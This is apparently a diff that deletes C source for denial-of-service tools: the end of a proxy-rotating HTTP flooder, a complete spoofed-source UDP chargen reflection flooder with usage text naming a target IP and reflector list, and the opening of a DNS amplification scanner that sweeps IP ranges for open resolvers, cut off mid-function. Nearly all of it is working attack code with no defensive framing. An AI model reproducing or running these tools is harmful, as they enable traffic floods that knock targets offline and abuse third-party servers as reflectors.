head->data->type = malloc(strlen(pch)+1); strcpy(head->data->type, pch);
|
|
||||||
pch = (char *)strtok(NULL, ":");
|
|
||||||
head->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
|
|
||||||
head->next = head;
|
|
||||||
head->prev = head;
|
|
||||||
} else {
|
|
||||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
|
||||||
bzero(new_node, sizeof(struct list));
|
|
||||||
new_node->data = (struct proxy *)malloc(sizeof(struct proxy));
|
|
||||||
bzero(new_node->data, sizeof(struct proxy));
|
|
||||||
new_node->data->working = 1;
|
|
||||||
new_node->data->ip = malloc(strlen(pch)+1); strcpy(new_node->data->ip, pch);
|
|
||||||
pch = (char *)strtok(NULL, ":");
|
|
||||||
if(pch == NULL) break;
|
|
||||||
new_node->data->port = atoi(pch);
|
|
||||||
pch = (char *)strtok(NULL, ":");
|
|
||||||
new_node->data->type = malloc(strlen(pch)+1); strcpy(new_node->data->type, pch);
|
|
||||||
pch = (char *)strtok(NULL, ":");
|
|
||||||
new_node->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
|
|
||||||
new_node->prev = head;
|
|
||||||
new_node->next = head->next;
|
|
||||||
head->next = new_node;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
free(buffer);
|
|
||||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
|
||||||
struct rlimit rl;
|
|
||||||
int result;
|
|
||||||
rl.rlim_cur = kOpenFD;
|
|
||||||
rl.rlim_max = kOpenFD;
|
|
||||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
|
||||||
if (result != 0)
|
|
||||||
{
|
|
||||||
perror("setrlimit");
|
|
||||||
fprintf(stderr, "setrlimit returned result = %d\n", result);
|
|
||||||
}
|
|
||||||
bzero(&rl, sizeof(struct rlimit));
|
|
||||||
rl.rlim_cur = 256 * 1024;
|
|
||||||
rl.rlim_max = 4096 * 1024;
|
|
||||||
result = setrlimit(RLIMIT_STACK, &rl);
|
|
||||||
if (result != 0)
|
|
||||||
{
|
|
||||||
perror("setrlimit_stack");
|
|
||||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
|
||||||
}
|
|
||||||
setupparts();
|
|
||||||
parseURL(argv[1], returnparts);
|
|
||||||
if(argc > 6 && !(strcmp(argv[6], "0") == 0))
|
|
||||||
{
|
|
||||||
ipstr = malloc(strlen(argv[6])+1);
|
|
||||||
bzero(ipstr, strlen(argv[6])+1);
|
|
||||||
strcpy(ipstr, argv[6]);
|
|
||||||
//fprintf(stdout, "Using manual IP...\n");
|
|
||||||
} else {
|
|
||||||
struct hostent *he;
|
|
||||||
struct in_addr a;
|
|
||||||
he = gethostbyname(returnparts[host]->value);
|
|
||||||
if (he)
|
|
||||||
{
|
|
||||||
while (*he->h_addr_list)
|
|
||||||
{
|
|
||||||
bcopy(*he->h_addr_list++, (char *) &a, sizeof(a));
|
|
||||||
ipstr = malloc(INET_ADDRSTRLEN+1);
|
|
||||||
inet_ntop (AF_INET, &a, ipstr, INET_ADDRSTRLEN);
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{ herror("gethostbyname"); }
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
char *postdata = malloc(1);
|
|
||||||
bzero(postdata, 1);
|
|
||||||
char *extrahead = malloc(1);
|
|
||||||
bzero(extrahead, 1);
|
|
||||||
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
postpayload = malloc(12001);
|
|
||||||
sprintf(postpayload, postformat, returnparts[host]->value, useragents[rand() % 40], fznGenerateRange());
|
|
||||||
freeparts();
|
|
||||||
|
|
||||||
//printf("Packet -> \n%s\n", postpayload);
|
|
||||||
|
|
||||||
//return 0;
|
|
||||||
|
|
||||||
//fprintf(stdout, "Starting Flood...\n");
|
|
||||||
|
|
||||||
fnAttackInformation(atoi(argv[argc-1]));
|
|
||||||
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create(&thread[i], NULL, &flood, (void *)head);
|
|
||||||
pthread_detach(thread[i]);
|
|
||||||
head = head->next;
|
|
||||||
}
|
|
||||||
|
|
||||||
int temp = atoi(argv[5]);
|
|
||||||
|
|
||||||
for(i = 0;i<temp;i++)
|
|
||||||
{
|
|
||||||
//rps=0;
|
|
||||||
sleep(1);
|
|
||||||
//printf("R/s: %d\n", rps);
|
|
||||||
}
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
void freeparts()
|
|
||||||
{
|
|
||||||
return;
|
|
||||||
if(returnparts[0]!=NULL) { free(returnparts[0]); }
|
|
||||||
if(returnparts[1]!=NULL) { free(returnparts[1]); }
|
|
||||||
if(returnparts[2]!=NULL) { free(returnparts[2]); }
|
|
||||||
if(returnparts[3]!=NULL) { free(returnparts[3]); }
|
|
||||||
if(returnparts[4]!=NULL) { free(returnparts[4]); }
|
|
||||||
if(returnparts[5]!=NULL) { free(returnparts[5]); }
|
|
||||||
if(returnparts[6]!=NULL) { free(returnparts[6]); }
|
|
||||||
if(returnparts[7]!=NULL) { free(returnparts[7]); }
|
|
||||||
/*if(returnparts[8]!=NULL) { free(returnparts[8]); }*/
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
void setupparts()
|
|
||||||
{
|
|
||||||
returnparts[0] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[1] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[2] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[3] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[4] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[5] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[6] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[7] = malloc(sizeof(struct urlparts));
|
|
||||||
/*returnparts[8] = malloc(sizeof(struct urlparts));*/
|
|
||||||
bzero(returnparts[0], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[1], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[2], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[3], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[4], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[5], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[6], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[7], sizeof(struct urlparts));
|
|
||||||
/*bzero(returnparts[8], sizeof(struct urlparts));*/
|
|
||||||
returnparts[0]->name = "scheme";
|
|
||||||
strcpy(returnparts[0]->separator, ":");
|
|
||||||
returnparts[1]->name = "userid";
|
|
||||||
strcpy(returnparts[1]->separator, "@");
|
|
||||||
returnparts[2]->name = "password";
|
|
||||||
strcpy(returnparts[2]->separator, ":");
|
|
||||||
returnparts[3]->name = "host";
|
|
||||||
strcpy(returnparts[3]->separator, "//");
|
|
||||||
returnparts[4]->name = "port";
|
|
||||||
strcpy(returnparts[4]->separator, ":");
|
|
||||||
returnparts[5]->name = "path";
|
|
||||||
strcpy(returnparts[5]->separator, "/");
|
|
||||||
returnparts[6]->name = "param";
|
|
||||||
strcpy(returnparts[6]->separator, ";");
|
|
||||||
/*returnparts[7]->name = "query";
|
|
||||||
strcpy(returnparts[7]->separator, "?");*/
|
|
||||||
returnparts[7]->name = "fragment";
|
|
||||||
strcpy(returnparts[7]->separator, "#");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
int parseURL(char *url, struct urlparts **returnpart) {
|
|
||||||
register i;
|
|
||||||
int seplen;
|
|
||||||
char * remainder;
|
|
||||||
//char * regall = ":/;?#";
|
|
||||||
char * regall = ":/;#";
|
|
||||||
//char * regpath = ":;?#";
|
|
||||||
char * regpath = ":;#";
|
|
||||||
char * regx;
|
|
||||||
if(!*url)
|
|
||||||
{
|
|
||||||
strcpy(parseError, "nothing to do!\n");
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
if((remainder = malloc(strlen(url) + 1)) == NULL)
|
|
||||||
{
|
|
||||||
printf("cannot allocate memory\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
strcpy(remainder, url);
|
|
||||||
if(firstpunc(remainder) == ':')
|
|
||||||
{
|
|
||||||
strcpy(returnpart[scheme]->value, strsplit(remainder, returnpart[scheme]->separator));
|
|
||||||
strleft(remainder, 1);
|
|
||||||
}
|
|
||||||
if (!strcmp(returnpart[scheme]->value, "mailto"))
|
|
||||||
*(returnpart[host]->separator) = 0;
|
|
||||||
for(i = 0; i < NUMPARTS; i++)
|
|
||||||
{
|
|
||||||
if(!*remainder)
|
|
||||||
break;
|
|
||||||
if(i == scheme || i == userid || i == password)
|
|
||||||
continue;
|
|
||||||
if(i == host && strchr(remainder, '@'))
|
|
||||||
{
|
|
||||||
if(!strncmp(remainder, "//", 2))
|
|
||||||
strleft(remainder, 2);
|
|
||||||
strcpy(returnpart[userid]->value, strsplit(remainder, ":@"));
|
|
||||||
strleft(remainder, 1);
|
|
||||||
if(strchr(remainder, '@'))
|
|
||||||
{
|
|
||||||
strcpy(returnpart[password]->value, strsplit(remainder, "@"));
|
|
||||||
strleft(remainder, 1);
|
|
||||||
}
|
|
||||||
*(returnpart[host]->separator) = 0;
|
|
||||||
}
|
|
||||||
if(i == path && (! *(returnpart[scheme]->value)))
|
|
||||||
{
|
|
||||||
*(returnpart[path]->separator) = 0;
|
|
||||||
strcpy(returnpart[scheme]->value, "http");
|
|
||||||
}
|
|
||||||
regx = (i == path) ? regpath : regall ;
|
|
||||||
seplen = strlen(returnpart[i]->separator);
|
|
||||||
if(strncmp(remainder, returnpart[i]->separator, seplen))
|
|
||||||
continue;
|
|
||||||
else
|
|
||||||
strleft(remainder, seplen);
|
|
||||||
strcpy(returnpart[i]->value, strsplit(remainder, regx));
|
|
||||||
}
|
|
||||||
if(*remainder)
|
|
||||||
sprintf(parseError, "I don't understand '%s'", remainder);
|
|
||||||
free(remainder);
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
char *str_replace(char *orig, char *rep, char *with) {
|
|
||||||
char *result;
|
|
||||||
char *ins;
|
|
||||||
char *tmp;
|
|
||||||
int len_rep;
|
|
||||||
int len_with;
|
|
||||||
int len_front;
|
|
||||||
int count;
|
|
||||||
if (!orig)
|
|
||||||
return NULL;
|
|
||||||
if (!rep || !(len_rep = strlen(rep)))
|
|
||||||
return NULL;
|
|
||||||
if (!(ins = strstr(orig, rep)))
|
|
||||||
return NULL;
|
|
||||||
if (!with)
|
|
||||||
with = "";
|
|
||||||
len_with = strlen(with);
|
|
||||||
for (count = 0; tmp = strstr(ins, rep); ++count) {
|
|
||||||
ins = tmp + len_rep;
|
|
||||||
}
|
|
||||||
tmp = result = malloc(strlen(orig) + (len_with - len_rep) * count + 1);
|
|
||||||
if (!result)
|
|
||||||
return NULL;
|
|
||||||
while (count--) {
|
|
||||||
ins = strstr(orig, rep);
|
|
||||||
len_front = ins - orig;
|
|
||||||
tmp = strncpy(tmp, orig, len_front) + len_front;
|
|
||||||
tmp = strcpy(tmp, with) + len_with;
|
|
||||||
orig += len_front + len_rep;
|
|
||||||
}
|
|
||||||
strcpy(tmp, orig);
|
|
||||||
return result;
|
|
||||||
}
|
|
||||||
char *stristr(const char *String, const char *Pattern)
|
|
||||||
{
|
|
||||||
char *pptr, *sptr, *start;
|
|
||||||
uint slen, plen;
|
|
||||||
for (start = (char *)String,
|
|
||||||
pptr = (char *)Pattern,
|
|
||||||
slen = strlen(String),
|
|
||||||
plen = strlen(Pattern);
|
|
||||||
slen >= plen;
|
|
||||||
start++, slen--)
|
|
||||||
{
|
|
||||||
|
|
||||||
while (toupper(*start) != toupper(*Pattern))
|
|
||||||
{
|
|
||||||
start++;
|
|
||||||
slen--;
|
|
||||||
|
|
||||||
if (slen < plen)
|
|
||||||
return(NULL);
|
|
||||||
}
|
|
||||||
sptr = start;
|
|
||||||
pptr = (char *)Pattern;
|
|
||||||
while (toupper(*sptr) == toupper(*pptr))
|
|
||||||
{
|
|
||||||
sptr++;
|
|
||||||
pptr++;
|
|
||||||
|
|
||||||
if ('\0' == *pptr)
|
|
||||||
return (start);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return(NULL);
|
|
||||||
}
|
|
||||||
char * strsplit(char * s, char * tok) {
|
|
||||||
#define OUTLEN (255)
|
|
||||||
register i, j;
|
|
||||||
static char out[OUTLEN + 1];
|
|
||||||
for(i = 0; s[i] && i < OUTLEN; i++)
|
|
||||||
{
|
|
||||||
if(strchr(tok, s[i]))
|
|
||||||
break;
|
|
||||||
else
|
|
||||||
out[i] = s[i];
|
|
||||||
}
|
|
||||||
out[i] = 0;
|
|
||||||
if(i && s[i])
|
|
||||||
{
|
|
||||||
for(j = 0; s[i]; i++, j++) s[j] = s[i];
|
|
||||||
s[j] = 0;
|
|
||||||
}
|
|
||||||
else if (!s[i])
|
|
||||||
*s = 0;
|
|
||||||
return out;
|
|
||||||
}
|
|
||||||
char firstpunc(char * s) {
|
|
||||||
while(*s++)
|
|
||||||
if(!isalnum(*s)) return *s;
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
int strleft(char * s, int n) {
|
|
||||||
int l;
|
|
||||||
l = strlen(s);
|
|
||||||
if(l < n)
|
|
||||||
return -1;
|
|
||||||
else if (l == n)
|
|
||||||
*s = 0;
|
|
||||||
memmove(s, s + n, l - n + 1);
|
|
||||||
return n;
|
|
||||||
}
|
|
||||||
|
|
||||||
unsigned int fnGetIP(char *szHost) {
|
|
||||||
static struct in_addr addr;
|
|
||||||
struct hostent *hHost;
|
|
||||||
addr.s_addr = inet_addr(szHost);
|
|
||||||
if(addr.s_addr == -1)
|
|
||||||
{
|
|
||||||
hHost = gethostbyname(szHost);
|
|
||||||
if(hHost == NULL)
|
|
||||||
{
|
|
||||||
exit(0);
|
|
||||||
}
|
|
||||||
bcopy(hHost->h_addr, (char *)&addr.s_addr, hHost->h_length);
|
|
||||||
}
|
|
||||||
return addr.s_addr;
|
|
||||||
}
|
|
@ -1,187 +0,0 @@
|
|||||||
#include <time.h>
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/udp.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
#define MAX_PACKET_SIZE 8192
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
static uint32_t Q[4096], c = 362436;
|
|
||||||
struct list
|
|
||||||
{
|
|
||||||
struct sockaddr_in data;
|
|
||||||
struct list *next;
|
|
||||||
struct list *prev;
|
|
||||||
};
|
|
||||||
struct list *head;
|
|
||||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
|
||||||
void init_rand(uint32_t x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++)
|
|
||||||
{
|
|
||||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
uint32_t rand_cmwc(void)
|
|
||||||
{
|
|
||||||
uint64_t t, a = 18782LL;
|
|
||||||
static uint32_t i = 4095;
|
|
||||||
uint32_t x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
|
|
||||||
/* function for header checksums */
|
|
||||||
unsigned short csum (unsigned short *buf, int nwords)
|
|
||||||
{
|
|
||||||
unsigned long sum;
|
|
||||||
for (sum = 0; nwords > 0; nwords--)
|
|
||||||
sum += *buf++;
|
|
||||||
sum = (sum >> 16) + (sum & 0xffff);
|
|
||||||
sum += (sum >> 16);
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 4;
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = IPPROTO_UDP;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_udp_header(struct udphdr *udph)
|
|
||||||
{
|
|
||||||
udph->source = htons(5678);
|
|
||||||
udph->dest = htons(19);
|
|
||||||
udph->check = 0;
|
|
||||||
strcpy((void *)udph + sizeof(struct udphdr), "h");
|
|
||||||
udph->len=htons(sizeof(struct udphdr) + 3);
|
|
||||||
}
|
|
||||||
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
struct thread_data *td = (struct thread_data *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
|
||||||
struct sockaddr_in sin = td->sin;
|
|
||||||
struct list *list_node = td->list_node;
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
init_rand(time(NULL));
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_udp_header(udph);
|
|
||||||
udph->source = sin.sin_port;
|
|
||||||
iph->saddr = sin.sin_addr.s_addr;
|
|
||||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
int i=0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
|
||||||
list_node = list_node->next;
|
|
||||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
|
||||||
if(i==5)
|
|
||||||
{
|
|
||||||
usleep(0);
|
|
||||||
i=0;
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 4){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <throttle> <time (optional)>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
int i = 0;
|
|
||||||
head = NULL;
|
|
||||||
fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
int max_len = 128;
|
|
||||||
char *buffer = (char *) malloc(max_len);
|
|
||||||
buffer = memset(buffer, 0x00, max_len);
|
|
||||||
int num_threads = atoi(argv[4]);
|
|
||||||
FILE *list_fd = fopen(argv[3], "r");
|
|
||||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
|
||||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
|
||||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
|
||||||
buffer[strlen(buffer) - 1] = 0x00;
|
|
||||||
if(head == NULL)
|
|
||||||
{
|
|
||||||
head = (struct list *)malloc(sizeof(struct list));
|
|
||||||
bzero(&head->data, sizeof(head->data));
|
|
||||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
|
||||||
head->next = head;
|
|
||||||
head->prev = head;
|
|
||||||
} else {
|
|
||||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
|
||||||
memset(new_node, 0x00, sizeof(struct list));
|
|
||||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
|
||||||
new_node->prev = head;
|
|
||||||
new_node->next = head->next;
|
|
||||||
head->next = new_node;
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
} else {
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
struct list *current = head->next;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons(atoi(argv[2]));
|
|
||||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
|
||||||
struct thread_data td[num_threads];
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
td[i].thread_id = i;
|
|
||||||
td[i].sin= sin;
|
|
||||||
td[i].list_node = current;
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting Flood...\n");
|
|
||||||
if(argc > 5)
|
|
||||||
{
|
|
||||||
sleep(atoi(argv[5]));
|
|
||||||
} else {
|
|
||||||
while(1){
|
|
||||||
sleep(1);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return 0;
|
|
||||||
}
|
|
Binary file not shown.
@ -1,299 +0,0 @@
|
|||||||
#include <pthread.h>
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <signal.h>
|
|
||||||
#include <sys/time.h>
|
|
||||||
#include <sys/types.h>
|
|
||||||
#include <math.h>
|
|
||||||
#include <stropts.h>
|
|
||||||
#include <ctype.h>
|
|
||||||
#include <errno.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/udp.h>
|
|
||||||
|
|
||||||
struct DNS_HEADER
|
|
||||||
{
|
|
||||||
unsigned short id; // identification number
|
|
||||||
|
|
||||||
unsigned char rd :1; // recursion desired
|
|
||||||
unsigned char tc :1; // truncated message
|
|
||||||
unsigned char aa :1; // authoritive answer
|
|
||||||
unsigned char opcode :4; // purpose of message
|
|
||||||
unsigned char qr :1; // query/response flag
|
|
||||||
|
|
||||||
unsigned char rcode :4; // response code
|
|
||||||
unsigned char cd :1; // checking disabled
|
|
||||||
unsigned char ad :1; // authenticated data
|
|
||||||
unsigned char z :1; // its z! reserved
|
|
||||||
unsigned char ra :1; // recursion available
|
|
||||||
|
|
||||||
unsigned short q_count; // number of question entries
|
|
||||||
unsigned short ans_count; // number of answer entries
|
|
||||||
unsigned short auth_count; // number of authority entries
|
|
||||||
unsigned short add_count; // number of resource entries
|
|
||||||
};
|
|
||||||
|
|
||||||
struct QUESTION
|
|
||||||
{
|
|
||||||
unsigned short qtype;
|
|
||||||
unsigned short qclass;
|
|
||||||
};
|
|
||||||
|
|
||||||
#pragma pack(push, 1)
|
|
||||||
struct R_DATA
|
|
||||||
{
|
|
||||||
unsigned short type;
|
|
||||||
unsigned short _class;
|
|
||||||
unsigned int ttl;
|
|
||||||
unsigned short data_len;
|
|
||||||
};
|
|
||||||
#pragma pack(pop)
|
|
||||||
|
|
||||||
struct RES_RECORD
|
|
||||||
{
|
|
||||||
unsigned char *name;
|
|
||||||
struct R_DATA *resource;
|
|
||||||
unsigned char *rdata;
|
|
||||||
};
|
|
||||||
|
|
||||||
typedef struct
|
|
||||||
{
|
|
||||||
unsigned char *name;
|
|
||||||
struct QUESTION *ques;
|
|
||||||
} QUERY;
|
|
||||||
|
|
||||||
volatile int running_threads = 0;
|
|
||||||
volatile int found_srvs = 0;
|
|
||||||
volatile unsigned long per_thread = 0;
|
|
||||||
volatile unsigned long start = 0;
|
|
||||||
volatile unsigned long scanned = 0;
|
|
||||||
volatile int sleep_between = 0;
|
|
||||||
volatile int bytes_sent = 0;
|
|
||||||
volatile unsigned long hosts_done = 0;
|
|
||||||
FILE *fd;
|
|
||||||
|
|
||||||
void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
|
|
||||||
{
|
|
||||||
int lock = 0 , i;
|
|
||||||
strcat((char*)host,".");
|
|
||||||
|
|
||||||
for(i = 0 ; i < strlen((char*)host) ; i++)
|
|
||||||
{
|
|
||||||
if(host[i]=='.')
|
|
||||||
{
|
|
||||||
*dns++ = i-lock;
|
|
||||||
for(;lock<i;lock++)
|
|
||||||
{
|
|
||||||
*dns++=host[lock];
|
|
||||||
}
|
|
||||||
lock++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
*dns++='\0';
|
|
||||||
}
|
|
||||||
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
running_threads++;
|
|
||||||
int thread_id = (int)par1;
|
|
||||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
|
||||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
|
||||||
unsigned long w;
|
|
||||||
int y;
|
|
||||||
unsigned char *host = (unsigned char *)malloc(50);
|
|
||||||
strcpy((char *)host, ".");
|
|
||||||
unsigned char buf[65536],*qname;
|
|
||||||
struct DNS_HEADER *dns = NULL;
|
|
||||||
struct QUESTION *qinfo = NULL;
|
|
||||||
dns = (struct DNS_HEADER *)&buf;
|
|
||||||
|
|
||||||
dns->id = (unsigned short) htons(rand());
|
|
||||||
dns->qr = 0;
|
|
||||||
dns->opcode = 0;
|
|
||||||
dns->aa = 0;
|
|
||||||
dns->tc = 0;
|
|
||||||
dns->rd = 1;
|
|
||||||
dns->ra = 0;
|
|
||||||
dns->z = 0;
|
|
||||||
dns->ad = 0;
|
|
||||||
dns->cd = 0;
|
|
||||||
dns->rcode = 0;
|
|
||||||
dns->q_count = htons(1);
|
|
||||||
dns->ans_count = 0;
|
|
||||||
dns->auth_count = 0;
|
|
||||||
dns->add_count = htons(1);
|
|
||||||
qname =(unsigned char*)&buf[sizeof(struct DNS_HEADER)];
|
|
||||||
|
|
||||||
ChangetoDnsNameFormat(qname , host);
|
|
||||||
qinfo =(struct QUESTION*)&buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname) + 1)];
|
|
||||||
|
|
||||||
qinfo->qtype = htons( 255 );
|
|
||||||
qinfo->qclass = htons(1);
|
|
||||||
|
|
||||||
void *edns = (void *)qinfo + sizeof(struct QUESTION)+1;
|
|
||||||
memset(edns, 0x00, 1);
|
|
||||||
memset(edns+1, 0x29, 1);
|
|
||||||
memset(edns+2, 0xFF, 2);
|
|
||||||
memset(edns+4, 0x00, 7);
|
|
||||||
|
|
||||||
int sizeofpayload = sizeof(struct DNS_HEADER) + (strlen((const char *)qname)+1) + sizeof(struct QUESTION) + 11;
|
|
||||||
int sock;
|
|
||||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
|
||||||
perror("cant open socket");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
|
||||||
{
|
|
||||||
struct sockaddr_in servaddr;
|
|
||||||
bzero(&servaddr, sizeof(servaddr));
|
|
||||||
servaddr.sin_family = AF_INET;
|
|
||||||
servaddr.sin_addr.s_addr=htonl(w);
|
|
||||||
servaddr.sin_port=htons(53);
|
|
||||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
|
||||||
bytes_sent+=24;
|
|
||||||
scanned++;
|
|
||||||
hosts_done++;
|
|
||||||
usleep(sleep_between*1000);
|
|
||||||
}
|
|
||||||
close(sock);
|
|
||||||
running_threads--;
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
void sighandler(int sig)
|
|
||||||
{
|
|
||||||
fclose(fd);
|
|
||||||
printf("\n");
|
|
||||||
exit(0);
|
|
||||||
}
|
|
||||||
|
|
||||||
void recievethread()
|
|
||||||
{
|
|
||||||
printf("Started Listening Thread\n");
|
|
||||||
int saddr_size, data_size, sock_raw;
|
|
||||||
struct sockaddr_in saddr;
|
|
||||||
struct in_addr in;
|
|
||||||
|
|
||||||
unsigned char *buffer = (unsigned char *)malloc(65536);
|
|
||||||
sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
|
|
||||||
if(sock_raw < 0)
|
|
||||||
{
|
|
||||||
printf("Socket Error\n");
|
|
||||||
exit(1);
|
|
||||||
}
|
|
||||||
while(1)
|
|
||||||
{
|
|
||||||
saddr_size = sizeof saddr;
|
|
||||||
data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
|
|
||||||
if(data_size <0 )
|
|
||||||
{
|
|
||||||
printf("Recvfrom error , failed to get packets\n");
|
|
||||||
exit(1);
|
|
||||||
}
|
|
||||||
struct iphdr *iph = (struct iphdr*)buffer;
|
|
||||||
if(iph->protocol == 17)
|
|
||||||
{
|
|
||||||
unsigned short iphdrlen = iph->ihl*4;
|
|
||||||
struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
|
|
||||||
unsigned char* payload = buffer + iphdrlen + 8;
|
|
||||||
if(ntohs(udph->source) == 53)
|
|
||||||
{
|
|
